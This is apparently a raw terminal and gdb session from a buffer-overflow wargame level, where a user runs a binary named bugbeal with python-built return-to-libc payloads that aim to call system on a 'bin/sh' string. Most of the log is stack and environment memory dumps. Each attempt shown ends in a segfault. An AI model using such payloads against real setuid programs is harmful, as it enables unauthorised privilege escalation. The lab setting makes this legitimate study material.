0xbffffc14:	0x41414141	0xe0414141	0x4140058a	0x3c414141
0xbffffc24:	0x00bffffc	0x42414241	0x42414241	0x42414241
0xbffffc34:	0x42414241	0x6e696241	0x0068732f	0x3d445750
0xbffffc44:	0x6d6f682f	0x61642f65	0x6e6b6b72	0x74686769
0xbffffc54:	0x4d455200	0x4845544f	0x3d54534f	0x2e323931
0xbffffc64:	0x2e383631	0x2e353332	0x4f480031	0x414e5453
0xbffffc74:	0x6c3d454d	0x6c61636f	0x74736f68	0x636f6c2e
(gdb) x/40 $esp-1
0xbffffaa3:	0xfffc3c41	0xfffa00bf	0x013868bf	0x00000340
0xbffffab3:	0x04838000	0x00000008	0x0483a100	0x04843008
0xbffffac3:	0x00000308	0xfffae400	0x0482e0bf	0x0484dc08
0xbffffad3:	0x00ae6008	0xfffadc40	0x013e90bf	0x00000340
0xbffffae3:	0xfffbe500	0xfffbefbf	0xfffc28bf	0x000000bf
0xbffffaf3:	0xfffc4000	0xfffc55bf	0xfffc6ebf	0xfffc8dbf
0xbffffb03:	0xfffcafbf	0xfffcbfbf	0xfffe82bf	0xfffea1bf
0xbffffb13:	0xfffec1bf	0xfffed6bf	0xfffef8bf	0xffff03bf
0xbffffb23:	0xffff1dbf	0xffff30bf	0xffff38bf	0xffff42bf
0xbffffb33:	0xffff52bf	0xffff60bf	0xffff6ebf	0xffff7fbf
(gdb) 
0xbffffb43:	0xffff8abf	0xffffa0bf	0xffffe6bf	0x000000bf
0xbffffb53:	0x00000300	0x04803400	0x00000408	0x00002000
0xbffffb63:	0x00000500	0x00000600	0x00000600	0x00100000
0xbffffb73:	0x00000700	0x00000000	0x00000840	0x00000000
0xbffffb83:	0x00000900	0x04838000	0x00000b08	0x00020000
0xbffffb93:	0x00000c00	0x00020000	0x00000d00	0x00020000
0xbffffba3:	0x00000e00	0x00020000	0x00001000	0xabfbff00
0xbffffbb3:	0x00000f0f	0xfffbe000	0x000000bf	0x00000000
0xbffffbc3:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbd3:	0x00000000	0x00000000	0x00000000	0x38366900
(gdb) 
0xbffffbe3:	0x2f2e0036	0x62677562	0x006c6165	0x41414141
0xbffffbf3:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc03:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc13:	0x41414141	0x41414141	0x40058ae0	0x41414141
0xbffffc23:	0xbffffc3c	0x41424100	0x41424142	0x41424142
0xbffffc33:	0x41424142	0x69624142	0x68732f6e	0x44575000
0xbffffc43:	0x6f682f3d	0x642f656d	0x6b6b7261	0x6867696e
0xbffffc53:	0x45520074	0x45544f4d	0x54534f48	0x3239313d
0xbffffc63:	0x3836312e	0x3533322e	0x4800312e	0x4e54534f
0xbffffc73:	0x3d454d41	0x61636f6c	0x736f686c	0x6f6c2e74
(gdb) x/40b $esp-1
0xbffffaa3:	0x41	0x3c	0xfc	0xff	0xbf	0x00	0xfa	0xff
0xbffffaab:	0xbf	0x68	0x38	0x01	0x40	0x03	0x00	0x00
0xbffffab3:	0x00	0x80	0x83	0x04	0x08	0x00	0x00	0x00
0xbffffabb:	0x00	0xa1	0x83	0x04	0x08	0x30	0x84	0x04
0xbffffac3:	0x08	0x03	0x00	0x00	0x00	0xe4	0xfa	0xff
(gdb) 
0xbffffacb:	0xbf	0xe0	0x82	0x04	0x08	0xdc	0x84	0x04
0xbffffad3:	0x08	0x60	0xae	0x00	0x40	0xdc	0xfa	0xff
0xbffffadb:	0xbf	0x90	0x3e	0x01	0x40	0x03	0x00	0x00
0xbffffae3:	0x00	0xe5	0xfb	0xff	0xbf	0xef	0xfb	0xff
0xbffffaeb:	0xbf	0x28	0xfc	0xff	0xbf	0x00	0x00	0x00
(gdb) 
0xbffffaf3:	0x00	0x40	0xfc	0xff	0xbf	0x55	0xfc	0xff
0xbffffafb:	0xbf	0x6e	0xfc	0xff	0xbf	0x8d	0xfc	0xff
0xbffffb03:	0xbf	0xaf	0xfc	0xff	0xbf	0xbf	0xfc	0xff
0xbffffb0b:	0xbf	0x82	0xfe	0xff	0xbf	0xa1	0xfe	0xff
0xbffffb13:	0xbf	0xc1	0xfe	0xff	0xbf	0xd6	0xfe	0xff
(gdb) 
0xbffffb1b:	0xbf	0xf8	0xfe	0xff	0xbf	0x03	0xff	0xff
0xbffffb23:	0xbf	0x1d	0xff	0xff	0xbf	0x30	0xff	0xff
0xbffffb2b:	0xbf	0x38	0xff	0xff	0xbf	0x42	0xff	0xff
0xbffffb33:	0xbf	0x52	0xff	0xff	0xbf	0x60	0xff	0xff
0xbffffb3b:	0xbf	0x6e	0xff	0xff	0xbf	0x7f	0xff	0xff
(gdb) 
0xbffffb43:	0xbf	0x8a	0xff	0xff	0xbf	0xa0	0xff	0xff
0xbffffb4b:	0xbf	0xe6	0xff	0xff	0xbf	0x00	0x00	0x00
0xbffffb53:	0x00	0x03	0x00	0x00	0x00	0x34	0x80	0x04
0xbffffb5b:	0x08	0x04	0x00	0x00	0x00	0x20	0x00	0x00
0xbffffb63:	0x00	0x05	0x00	0x00	0x00	0x06	0x00	0x00
(gdb) 
0xbffffb6b:	0x00	0x06	0x00	0x00	0x00	0x00	0x10	0x00
0xbffffb73:	0x00	0x07	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffb7b:	0x40	0x08	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffb83:	0x00	0x09	0x00	0x00	0x00	0x80	0x83	0x04
0xbffffb8b:	0x08	0x0b	0x00	0x00	0x00	0x00	0x02	0x00
(gdb) 
0xbffffb93:	0x00	0x0c	0x00	0x00	0x00	0x00	0x02	0x00
0xbffffb9b:	0x00	0x0d	0x00	0x00	0x00	0x00	0x02	0x00
0xbffffba3:	0x00	0x0e	0x00	0x00	0x00	0x00	0x02	0x00
0xbffffbab:	0x00	0x10	0x00	0x00	0x00	0xff	0xfb	0xab
0xbffffbb3:	0x0f	0x0f	0x00	0x00	0x00	0xe0	0xfb	0xff
(gdb) 
0xbffffbbb:	0xbf	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffbc3:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffbcb:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffbd3:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffbdb:	0x00	0x00	0x00	0x00	0x00	0x69	0x36	0x38
(gdb) 
0xbffffbe3:	0x36	0x00	0x2e	0x2f	0x62	0x75	0x67	0x62
0xbffffbeb:	0x65	0x61	0x6c	0x00	0x41	0x41	0x41	0x41
0xbffffbf3:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffffbfb:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffffc03:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
(gdb) 
0xbffffc0b:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffffc13:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffffc1b:	0xe0	0x8a	0x05	0x40	0x41	0x41	0x41	0x41
0xbffffc23:	0x3c	0xfc	0xff	0xbf	0x00	0x41	0x42	0x41
0xbffffc2b:	0x42	0x41	0x42	0x41	0x42	0x41	0x42	0x41
(gdb) 
0xbffffc33:	0x42	0x41	0x42	0x41	0x42	0x41	0x62	0x69
0xbffffc3b:	0x6e	0x2f	0x73	0x68	0x00	0x50	0x57	0x44
0xbffffc43:	0x3d	0x2f	0x68	0x6f	0x6d	0x65	0x2f	0x64
0xbffffc4b:	0x61	0x72	0x6b	0x6b	0x6e	0x69	0x67	0x68
0xbffffc53:	0x74	0x00	0x52	0x45	0x4d	0x4f	0x54	0x45
(gdb) q
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"bin/sh"+"\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: bin/sh: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ gdb -q -c core
Core was generated by `./bugbeal AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9ABABABABAB'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) q        
[darkknight@localhost darkknight]$ gdb -q -c core
Core was generated by `./bugbeal AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9ABABABABAB'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) q     
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"bin/sh"+"\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: bin/sh: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"bin/sh"+"\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: bin/sh: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"bin/sh"+"\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: bin/sh: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ gdb -q -c core
Core was generated by `./bugbeal AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9ABABABABAB'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) x/40 $esp   
0xbffffaa4:	0xbffffc39	0xbffffa00	0x40013868	0x00000003
0xbffffab4:	0x08048380	0x00000000	0x080483a1	0x08048430
0xbffffac4:	0x00000003	0xbffffae4	0x080482e0	0x080484dc
0xbffffad4:	0x4000ae60	0xbffffadc	0x40013e90	0x00000003
0xbffffae4:	0xbffffbe5	0xbffffbef	0xbffffc28	0x00000000
0xbffffaf4:	0xbffffc40	0xbffffc55	0xbffffc6e	0xbffffc8d
0xbffffb04:	0xbffffcaf	0xbffffcbf	0xbffffe82	0xbffffea1
0xbffffb14:	0xbffffec1	0xbffffed6	0xbffffef8	0xbfffff03
0xbffffb24:	0xbfffff1d	0xbfffff30	0xbfffff38	0xbfffff42
0xbffffb34:	0xbfffff52	0xbfffff60	0xbfffff6e	0xbfffff7f
(gdb) 
0xbffffb44:	0xbfffff8a	0xbfffffa0	0xbfffffe6	0x00000000
0xbffffb54:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffb64:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffb74:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffb84:	0x00000009	0x08048380	0x0000000b	0x00000200
0xbffffb94:	0x0000000c	0x00000200	0x0000000d	0x00000200
0xbffffba4:	0x0000000e	0x00000200	0x00000010	0x0fabfbff
0xbffffbb4:	0x0000000f	0xbffffbe0	0x00000000	0x00000000
0xbffffbc4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbd4:	0x00000000	0x00000000	0x00000000	0x36383669
(gdb) 
0xbffffbe4:	0x622f2e00	0x65626775	0x41006c61	0x41414141
0xbffffbf4:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc04:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc14:	0x41414141	0xe0414141	0x4140058a	0x39414141
0xbffffc24:	0x00bffffc	0x42414241	0x42414241	0x42414241
0xbffffc34:	0x42414241	0x6e696241	0x0068732f	0x3d445750
0xbffffc44:	0x6d6f682f	0x61642f65	0x6e6b6b72	0x74686769
0xbffffc54:	0x4d455200	0x4845544f	0x3d54534f	0x2e323931
0xbffffc64:	0x2e383631	0x2e353332	0x4f480031	0x414e5453
0xbffffc74:	0x6c3d454d	0x6c61636f	0x74736f68	0x636f6c2e
(gdb) x/40 $esp-1
0xbffffaa3:	0xfffc3941	0xfffa00bf	0x013868bf	0x00000340
0xbffffab3:	0x04838000	0x00000008	0x0483a100	0x04843008
0xbffffac3:	0x00000308	0xfffae400	0x0482e0bf	0x0484dc08
0xbffffad3:	0x00ae6008	0xfffadc40	0x013e90bf	0x00000340
0xbffffae3:	0xfffbe500	0xfffbefbf	0xfffc28bf	0x000000bf
0xbffffaf3:	0xfffc4000	0xfffc55bf	0xfffc6ebf	0xfffc8dbf
0xbffffb03:	0xfffcafbf	0xfffcbfbf	0xfffe82bf	0xfffea1bf
0xbffffb13:	0xfffec1bf	0xfffed6bf	0xfffef8bf	0xffff03bf
0xbffffb23:	0xffff1dbf	0xffff30bf	0xffff38bf	0xffff42bf
0xbffffb33:	0xffff52bf	0xffff60bf	0xffff6ebf	0xffff7fbf
(gdb) 
0xbffffb43:	0xffff8abf	0xffffa0bf	0xffffe6bf	0x000000bf
0xbffffb53:	0x00000300	0x04803400	0x00000408	0x00002000
0xbffffb63:	0x00000500	0x00000600	0x00000600	0x00100000
0xbffffb73:	0x00000700	0x00000000	0x00000840	0x00000000
0xbffffb83:	0x00000900	0x04838000	0x00000b08	0x00020000
0xbffffb93:	0x00000c00	0x00020000	0x00000d00	0x00020000
0xbffffba3:	0x00000e00	0x00020000	0x00001000	0xabfbff00
0xbffffbb3:	0x00000f0f	0xfffbe000	0x000000bf	0x00000000
0xbffffbc3:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbd3:	0x00000000	0x00000000	0x00000000	0x38366900
(gdb) 
0xbffffbe3:	0x2f2e0036	0x62677562	0x006c6165	0x41414141
0xbffffbf3:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc03:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc13:	0x41414141	0x41414141	0x40058ae0	0x41414141
0xbffffc23:	0xbffffc39	0x41424100	0x41424142	0x41424142
0xbffffc33:	0x41424142	0x69624142	0x68732f6e	0x44575000
0xbffffc43:	0x6f682f3d	0x642f656d	0x6b6b7261	0x6867696e
0xbffffc53:	0x45520074	0x45544f4d	0x54534f48	0x3239313d
0xbffffc63:	0x3836312e	0x3533322e	0x4800312e	0x4e54534f
0xbffffc73:	0x3d454d41	0x61636f6c	0x736f686c	0x6f6c2e74
(gdb) q
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"bin/sh\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: bin/sh: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ gdb -q -c core
Core was generated by `./bugbeal AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9ABABABABAB'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) x/40 $esp  
0xbffffaa4:	0xbffffc39	0xbffffa00	0x40013868	0x00000003
0xbffffab4:	0x08048380	0x00000000	0x080483a1	0x08048430
0xbffffac4:	0x00000003	0xbffffae4	0x080482e0	0x080484dc
0xbffffad4:	0x4000ae60	0xbffffadc	0x40013e90	0x00000003
0xbffffae4:	0xbffffbe5	0xbffffbef	0xbffffc28	0x00000000
0xbffffaf4:	0xbffffc40	0xbffffc55	0xbffffc6e	0xbffffc8d
0xbffffb04:	0xbffffcaf	0xbffffcbf	0xbffffe82	0xbffffea1
0xbffffb14:	0xbffffec1	0xbffffed6	0xbffffef8	0xbfffff03
0xbffffb24:	0xbfffff1d	0xbfffff30	0xbfffff38	0xbfffff42
0xbffffb34:	0xbfffff52	0xbfffff60	0xbfffff6e	0xbfffff7f
(gdb) 
0xbffffb44:	0xbfffff8a	0xbfffffa0	0xbfffffe6	0x00000000
0xbffffb54:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffb64:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffb74:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffb84:	0x00000009	0x08048380	0x0000000b	0x00000200
0xbffffb94:	0x0000000c	0x00000200	0x0000000d	0x00000200
0xbffffba4:	0x0000000e	0x00000200	0x00000010	0x0fabfbff
0xbffffbb4:	0x0000000f	0xbffffbe0	0x00000000	0x00000000
0xbffffbc4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbd4:	0x00000000	0x00000000	0x00000000	0x36383669
(gdb) 
0xbffffbe4:	0x622f2e00	0x65626775	0x41006c61	0x41414141
0xbffffbf4:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc04:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc14:	0x41414141	0xe0414141	0x4140058a	0x39414141
0xbffffc24:	0x00bffffc	0x42414241	0x42414241	0x42414241
0xbffffc34:	0x42414241	0x6e696241	0x0068732f	0x3d445750
0xbffffc44:	0x6d6f682f	0x61642f65	0x6e6b6b72	0x74686769
0xbffffc54:	0x4d455200	0x4845544f	0x3d54534f	0x2e323931
0xbffffc64:	0x2e383631	0x2e353332	0x4f480031	0x414e5453
0xbffffc74:	0x6c3d454d	0x6c61636f	0x74736f68	0x636f6c2e
(gdb) 
0xbffffc84:	0x6f646c61	0x6e69616d	0x53454c00	0x45504f53
0xbffffc94:	0x2f7c3d4e	0x2f727375	0x2f6e6962	0x7373656c
0xbffffca4:	0x65706970	0x2068732e	0x55007325	0x3d524553
0xbffffcb4:	0x6b726164	0x67696e6b	0x4c007468	0x4f435f53
0xbffffcc4:	0x53524f4c	0x3d6f6e3d	0x663a3030	0x30303d69
0xbffffcd4:	0x3d69643a	0x333b3130	0x6e6c3a34	0x3b31303d
0xbffffce4:	0x703a3633	0x30343d69	0x3a33333b	0x303d6f73
0xbffffcf4:	0x35333b31	0x3d64623a	0x333b3034	0x31303b33
0xbffffd04:	0x3d64633a	0x333b3034	0x31303b33	0x3d726f3a
0xbffffd14:	0x303b3130	0x37333b35	0x3a31343b	0x303d696d
(gdb) x/40b $esp
0xbffffaa4:	0x39	0xfc	0xff	0xbf	0x00	0xfa	0xff	0xbf
0xbffffaac:	0x68	0x38	0x01	0x40	0x03	0x00	0x00	0x00
0xbffffab4:	0x80	0x83	0x04	0x08	0x00	0x00	0x00	0x00
0xbffffabc:	0xa1	0x83	0x04	0x08	0x30	0x84	0x04	0x08
0xbffffac4:	0x03	0x00	0x00	0x00	0xe4	0xfa	0xff	0xbf
(gdb) 
0xbffffacc:	0xe0	0x82	0x04	0x08	0xdc	0x84	0x04	0x08
0xbffffad4:	0x60	0xae	0x00	0x40	0xdc	0xfa	0xff	0xbf
0xbffffadc:	0x90	0x3e	0x01	0x40	0x03	0x00	0x00	0x00
0xbffffae4:	0xe5	0xfb	0xff	0xbf	0xef	0xfb	0xff	0xbf
0xbffffaec:	0x28	0xfc	0xff	0xbf	0x00	0x00	0x00	0x00
(gdb) 
0xbffffaf4:	0x40	0xfc	0xff	0xbf	0x55	0xfc	0xff	0xbf
0xbffffafc:	0x6e	0xfc	0xff	0xbf	0x8d	0xfc	0xff	0xbf
0xbffffb04:	0xaf	0xfc	0xff	0xbf	0xbf	0xfc	0xff	0xbf
0xbffffb0c:	0x82	0xfe	0xff	0xbf	0xa1	0xfe	0xff	0xbf
0xbffffb14:	0xc1	0xfe	0xff	0xbf	0xd6	0xfe	0xff	0xbf
(gdb) 
0xbffffb1c:	0xf8	0xfe	0xff	0xbf	0x03	0xff	0xff	0xbf
0xbffffb24:	0x1d	0xff	0xff	0xbf	0x30	0xff	0xff	0xbf
0xbffffb2c:	0x38	0xff	0xff	0xbf	0x42	0xff	0xff	0xbf
0xbffffb34:	0x52	0xff	0xff	0xbf	0x60	0xff	0xff	0xbf
0xbffffb3c:	0x6e	0xff	0xff	0xbf	0x7f	0xff	0xff	0xbf
(gdb) 
0xbffffb44:	0x8a	0xff	0xff	0xbf	0xa0	0xff	0xff	0xbf
0xbffffb4c:	0xe6	0xff	0xff	0xbf	0x00	0x00	0x00	0x00
0xbffffb54:	0x03	0x00	0x00	0x00	0x34	0x80	0x04	0x08
0xbffffb5c:	0x04	0x00	0x00	0x00	0x20	0x00	0x00	0x00
0xbffffb64:	0x05	0x00	0x00	0x00	0x06	0x00	0x00	0x00
(gdb) 
0xbffffb6c:	0x06	0x00	0x00	0x00	0x00	0x10	0x00	0x00
0xbffffb74:	0x07	0x00	0x00	0x00	0x00	0x00	0x00	0x40
0xbffffb7c:	0x08	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffb84:	0x09	0x00	0x00	0x00	0x80	0x83	0x04	0x08
0xbffffb8c:	0x0b	0x00	0x00	0x00	0x00	0x02	0x00	0x00
(gdb) 
0xbffffb94:	0x0c	0x00	0x00	0x00	0x00	0x02	0x00	0x00
0xbffffb9c:	0x0d	0x00	0x00	0x00	0x00	0x02	0x00	0x00
0xbffffba4:	0x0e	0x00	0x00	0x00	0x00	0x02	0x00	0x00
0xbffffbac:	0x10	0x00	0x00	0x00	0xff	0xfb	0xab	0x0f
0xbffffbb4:	0x0f	0x00	0x00	0x00	0xe0	0xfb	0xff	0xbf
(gdb) 
0xbffffbbc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffbc4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffbcc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffbd4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffbdc:	0x00	0x00	0x00	0x00	0x69	0x36	0x38	0x36
(gdb) 
0xbffffbe4:	0x00	0x2e	0x2f	0x62	0x75	0x67	0x62	0x65
0xbffffbec:	0x61	0x6c	0x00	0x41	0x41	0x41	0x41	0x41
0xbffffbf4:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffffbfc:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffffc04:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
(gdb) 
0xbffffc0c:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffffc14:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0xe0
0xbffffc1c:	0x8a	0x05	0x40	0x41	0x41	0x41	0x41	0x39
0xbffffc24:	0xfc	0xff	0xbf	0x00	0x41	0x42	0x41	0x42
0xbffffc2c:	0x41	0x42	0x41	0x42	0x41	0x42	0x41	0x42
(gdb) 
0xbffffc34:	0x41	0x42	0x41	0x42	0x41	0x62	0x69	0x6e
0xbffffc3c:	0x2f	0x73	0x68	0x00	0x50	0x57	0x44	0x3d
0xbffffc44:	0x2f	0x68	0x6f	0x6d	0x65	0x2f	0x64	0x61
0xbffffc4c:	0x72	0x6b	0x6b	0x6e	0x69	0x67	0x68	0x74
0xbffffc54:	0x00	0x52	0x45	0x4d	0x4f	0x54	0x45	0x48
(gdb) 
0xbffffc5c:	0x4f	0x53	0x54	0x3d	0x31	0x39	0x32	0x2e
0xbffffc64:	0x31	0x36	0x38	0x2e	0x32	0x33	0x35	0x2e
0xbffffc6c:	0x31	0x00	0x48	0x4f	0x53	0x54	0x4e	0x41
0xbffffc74:	0x4d	0x45	0x3d	0x6c	0x6f	0x63	0x61	0x6c
0xbffffc7c:	0x68	0x6f	0x73	0x74	0x2e	0x6c	0x6f	0x63
(gdb) 
0xbffffc84:	0x61	0x6c	0x64	0x6f	0x6d	0x61	0x69	0x6e
0xbffffc8c:	0x00	0x4c	0x45	0x53	0x53	0x4f	0x50	0x45
0xbffffc94:	0x4e	0x3d	0x7c	0x2f	0x75	0x73	0x72	0x2f
0xbffffc9c:	0x62	0x69	0x6e	0x2f	0x6c	0x65	0x73	0x73
0xbffffca4:	0x70	0x69	0x70	0x65	0x2e	0x73	0x68	0x20
(gdb) 
0xbffffcac:	0x25	0x73	0x00	0x55	0x53	0x45	0x52	0x3d
0xbffffcb4:	0x64	0x61	0x72	0x6b	0x6b	0x6e	0x69	0x67
0xbffffcbc:	0x68	0x74	0x00	0x4c	0x53	0x5f	0x43	0x4f
0xbffffcc4:	0x4c	0x4f	0x52	0x53	0x3d	0x6e	0x6f	0x3d
0xbffffccc:	0x30	0x30	0x3a	0x66	0x69	0x3d	0x30	0x30
(gdb) 
0xbffffcd4:	0x3a	0x64	0x69	0x3d	0x30	0x31	0x3b	0x33
0xbffffcdc:	0x34	0x3a	0x6c	0x6e	0x3d	0x30	0x31	0x3b
0xbffffce4:	0x33	0x36	0x3a	0x70	0x69	0x3d	0x34	0x30
0xbffffcec:	0x3b	0x33	0x33	0x3a	0x73	0x6f	0x3d	0x30
0xbffffcf4:	0x31	0x3b	0x33	0x35	0x3a	0x62	0x64	0x3d
(gdb) 
0xbffffcfc:	0x34	0x30	0x3b	0x33	0x33	0x3b	0x30	0x31
0xbffffd04:	0x3a	0x63	0x64	0x3d	0x34	0x30	0x3b	0x33
0xbffffd0c:	0x33	0x3b	0x30	0x31	0x3a	0x6f	0x72	0x3d
0xbffffd14:	0x30	0x31	0x3b	0x30	0x35	0x3b	0x33	0x37
0xbffffd1c:	0x3b	0x34	0x31	0x3a	0x6d	0x69	0x3d	0x30
(gdb) 
0xbffffd24:	0x31	0x3b	0x30	0x35	0x3b	0x33	0x37	0x3b
0xbffffd2c:	0x34	0x31	0x3a	0x65	0x78	0x3d	0x30	0x31
0xbffffd34:	0x3b	0x33	0x32	0x3a	0x2a	0x2e	0x63	0x6d
0xbffffd3c:	0x64	0x3d	0x30	0x31	0x3b	0x33	0x32	0x3a
0xbffffd44:	0x2a	0x2e	0x65	0x78	0x65	0x3d	0x30	0x31
(gdb) 
0xbffffd4c:	0x3b	0x33	0x32	0x3a	0x2a	0x2e	0x63	0x6f
0xbffffd54:	0x6d	0x3d	0x30	0x31	0x3b	0x33	0x32	0x3a
0xbffffd5c:	0x2a	0x2e	0x62	0x74	0x6d	0x3d	0x30	0x31
0xbffffd64:	0x3b	0x33	0x32	0x3a	0x2a	0x2e	0x62	0x61
0xbffffd6c:	0x74	0x3d	0x30	0x31	0x3b	0x33	0x32	0x3a
(gdb) 
0xbffffd74:	0x2a	0x2e	0x73	0x68	0x3d	0x30	0x31	0x3b
0xbffffd7c:	0x33	0x32	0x3a	0x2a	0x2e	0x63	0x73	0x68
0xbffffd84:	0x3d	0x30	0x31	0x3b	0x33	0x32	0x3a	0x2a
0xbffffd8c:	0x2e	0x74	0x61	0x72	0x3d	0x30	0x31	0x3b
0xbffffd94:	0x33	0x31	0x3a	0x2a	0x2e	0x74	0x67	0x7a
(gdb) x/40s 0xbfffc39
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
0xbfffc39:	 <Address 0xbfffc39 out of bounds>
(gdb) x/40s 0xbffffc39
0xbffffc39:	 "bin/sh"
0xbffffc40:	 "PWD=/home/darkknight"
0xbffffc55:	 "REMOTEHOST=192.168.235.1"
0xbffffc6e:	 "HOSTNAME=localhost.localdomain"
0xbffffc8d:	 "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffcaf:	 "USER=darkknight"
